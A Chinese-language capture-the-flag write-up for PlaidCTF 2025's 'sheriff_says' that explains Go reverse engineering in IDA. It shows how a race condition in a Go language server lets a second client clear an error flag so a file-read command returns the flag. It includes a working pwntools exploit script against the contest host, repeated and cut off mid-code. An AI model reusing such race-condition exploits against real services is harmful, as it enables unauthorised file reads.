-
-
[原创]plaidctf 2025 sheriff_says wp
-
发表于: 2025-4-16 22:05 6883
-
我不语,只是一遍又一遍重复河豚鱼的教诲。
借此题,总结一下go逆向的技巧。
使用neovim与go语言实现的lsp(language server protocol)服务端交互,核心在于lsp server(go 实现)的逆向
lsp协议的的处理逻辑在这
下面的runtime_newobject就没有恢复返回值导致下面的v367飘红


由于go的函数调用的寄存器使用顺序 RAX、RBX、RCX、RDI、RSI、R8、R9、R10、R11
RDX用作闭包上下文的指针
go语言的函数开头都会插入栈检查代码,可以根据这个特征识别真正的参数,如这里就是rax一个参数

ida没有识别到返回值,而且go是支持多返回值的,有个大力出奇迹的方法,那就是把返回值修改为_OWORD, 返回两个返回值的函数是比较多的。
而且,据我观察函数中没有用的到倒数的参数,一般就是返回值,如这里的runtime_newobject()中的void *r0就是返回值。
修复后:好看很多(只修改函数签名还不够,还要在被调用出修改call type)

程序匹配method的长度,使用switch case匹配,关键点在workspace/executeCommand
其支持两个command:
通过逆向wildwest.loadNewConfig负责更新配置文件,如果配置文件设置了usefilesyetem为true,则会进入打开flag的逻辑。
其参数可以在其local type中看出来,

知道config需要这四个参数,但是还要确定其传参的格式,在main_loadNewConfigReflectively中
调用reflect_value_elem,reflect_value_fieldByName来反射

最后查看Argument的类型是个slice知道穿的是数组

最后确定了格式:
对于wildwest.quickDraw,传的也是三个参数,程序会检查三个参数的类型,依次是string,float,string,分别对应文件名,文件行,第三个string没有用到。

如果quickDraw传入的文件名包括’flag’,则传入main.err

在后面会检查main.err 如果有 则退出 代码运行不到 readFileConrtent

但是观察到这里面有个大循环,故意拖时间,可以main.err是个全局变量,所以这里有个条件竞争。
在initialize中,会将main.err置空,所以需要另外启动一个客户端去竞争,把main.err置空
在quickDraw中,会检查修复的修复的次数,必须修复过warning才可以

所以在didopen的时候传入会warning的文本
然后再didchange传入修复好的文本就可以了
[{ "EnforcePrefix": False, "RequiredPrefix": "sheriff_says_", "MinimumNameLength": 1, "UseFileSystem": True}][{ "EnforcePrefix": False, "RequiredPrefix": "sheriff_says_", "MinimumNameLength": 1, "UseFileSystem": True}]from pwn import *import timeimport jsonimport socketfrom typing import Dict, Anyclass SimpleLSClient: def __init__(self, host: str = 'localhost', port: int = 9999): """初始化 LSP 客户端""" self.host = host self.port = port self.socket = None self.request_id = 0 context.log_level = 'debug' def connect(self): """建立 socket 连接""" try: self.socket = remote(self.host, self.port) except Exception as e: print(f"连接失败: {e}") def disconnect(self): """关闭连接""" if self.socket: self.socket.close() print("连接已关闭") def build_request(self, method: str, params: Dict[str, Any] = None) -> str: """构建 LSP 请求""" self.request_id += 1 request = { "jsonrpc": "2.0", "id": self.request_id, "method": method, "params": params or {} } # 转换为 JSON 并添加 Content-Length 头 content = json.dumps(request) header = f"Content-Length: {len(content)}\r\n\r\n" return header + content def send_request(self, method: str, params: Dict[str, Any] = None) -> Dict[str, Any]: """发送请求并接收响应""" if not self.socket: raise ConnectionError("未连接到服务器") # 构建并发送请求 request = self.build_request(method, params) self.socket.send(request.encode('utf-8')) # 接收响应 response = self.receive_response() return response def receive_response(self) -> Dict[str, Any]: """接收并解析服务器响应""" # 首先读取 header header = "" while '\r\n\r\n' not in header: header += self.socket.recv(1).decode('utf-8') # 解析 Content-Length content_length = int(header.split('Content-Length: ')[1].split('\r\n')[0]) # 读取响应内容 content = b"" while len(content) < content_length: content += self.socket.recv(content_length - len(content)) return json.loads(content.decode())def make_initialize_request(client): init_params = { "processId": None, "rootUri": "file:///mnt/e/CTF/plaidctf2025/sheriff_says", "capabilities": { "textDocument": { "Completion": { "CompletionItem": { "sSnippetSupport": True } } } }, "clientinfo":{ "name": "neovim", 'version': "1" } } response = client.send_request("initialize", init_params) print("Initialize 响应:", json.dumps(response, indent=2)) # client.send_request("initialized", {})def make_did_open_request(client,code): did_open_params = { "textDocument": { "uri": "file:///mnt/e/CTF/plaidctf2025/sheriff_says/test.go", "text": code } } response = client.send_request("textDocument/didOpen", did_open_params) print("DidOpen 响应:", json.dumps(response, indent=2))def make_did_change_request(client,code): did_change_params = { "textDocument": { "uri": "file:///mnt/e/CTF/plaidctf2025/sheriff_says/test.go", }, "contentChanges": [ { "text": code } ] } response = client.send_request("textDocument/didChange", did_change_params) print("DidChange 响应:", json.dumps(response, indent=2))def make_execute_command_request(client,command,args): print(command) execute_command_params = { "command": command, "arguments": args } response = client.send_request("workspace/executeCommand", execute_command_params) print("ExecuteCommand 响应:", json.dumps(response, indent=2))go_code = '''// test.gopackage mainimport "fmt"func test1() { wr_bronco_sheriff := 1 return wr_bronco_sheriff // this is a comment}'''go_rename_code = '''// test.gopackage mainimport "fmt"func sheriff_says_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa() { wr_bronco_sheriff := 1 return wr_bronco_sheriff // this is a comment}'''def main(): # 创建客户端实例 client = SimpleLSClient('54.221.151.72',7010) # 连接到服务器 client.connect() client2 = SimpleLSClient('54.221.151.72',7010) client2.connect() # try: make_initialize_request(client) make_did_open_request(client, go_code) make_did_change_request(client, go_rename_code) make_execute_command_request(client, "wildwest.loadNewConfig", [ {"EnforcePrefix": False, "RequiredPrefix":"sheriff_says_a", "MinimumNameLength": 1, "UseFileSystem": True}, 0,0 ]) make_execute_command_request(client, "wildwest.quickDraw",['flag',0.0,'']) make_initialize_request(client2) print(client.socket.recv()) client.socket.interactive() # time.sleep(2) # except Exception as e: # print(f"错误: {e}") # finally: # client.disconnect()if __name__ == "__main__": main()# PCTF{sh3riFF_$4y$_y0uR_c0D3_1$_cL34N_dd323724983c}from pwn import *import timeimport jsonimport socketfrom typing import Dict, Anyclass SimpleLSClient: def __init__(self, host: str = 'localhost', port: int = 9999): """初始化 LSP 客户端""" self.host = host self.port = port self.socket = None self.request_id = 0 context.log_level = 'debug' def connect(self): """建立 socket 连接""" try: self.socket = remote(self.host, self.port) except Exception as e: print(f"连接失败: {e}") def disconnect(self): """关闭连接""" if self.socket: self.socket.close() print("连接已关闭") def build_request(self, method: str, params: Dict[str, Any] = None) -> str: """构建 LSP 请求""" self.request_id += 1 request = { "jsonrpc": "2.0", "id": self.request_id, "method": method, "params": params or {} } # 转换为 JSON 并添加 Content-Length 头 content = json.dumps(request) header = f"Content-Length: {len(content)}\r\n\r\n" return header + content def send_request(self, method: str, params: Dict[str, Any] = None) -> Dict[str, Any]: """发送请求并接收响应""" if not self.socket: raise ConnectionError("未连接到服务器") # 构建并发送请求 request = self.build_request(method, params) self.socket.send(request.encode('utf-8')) # 接收响应 response = self.receive_response() return response def receive_response(self) -> Dict[str, Any]: """接收并解析服务器响应""" # 首先读取 header header = "" while '\r\n\r\n' not in header: header += self.socket.recv(1).decode('utf-8') # 解析 Content-Length content_length = int(header.split('Content-Length: ')[1].split('\r\n')[0]) # 读取响应内容 content = b"" while len(content) < content_length: content += self.socket.recv(content_length - len(content)) return json.loads(content.decode())def make_initialize_request(client): init_params = { "processId": None, "rootUri": "file:///mnt/e/CTF/plaidctf2025/sheriff_says",